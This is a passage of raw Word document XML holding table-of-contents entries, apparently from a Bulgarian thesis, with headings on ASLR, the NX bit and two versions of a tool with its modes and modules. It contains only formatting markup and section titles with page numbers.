            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540792" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ASLR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540792 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540793" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NX bit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540793 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540794" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Първа версия на инструмента</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540794 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540795" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Режими</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540796" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.4.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модули</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540797" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.4.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Инструменти</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540798" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.4.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Максимална свобода и параметризация</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540799" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.4.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Недостатъци</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540800" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Втора версия</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540801" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.5.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>“Водено” изпълнение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540802" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.5.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Идеята за Branch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540803" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.5.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модули</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
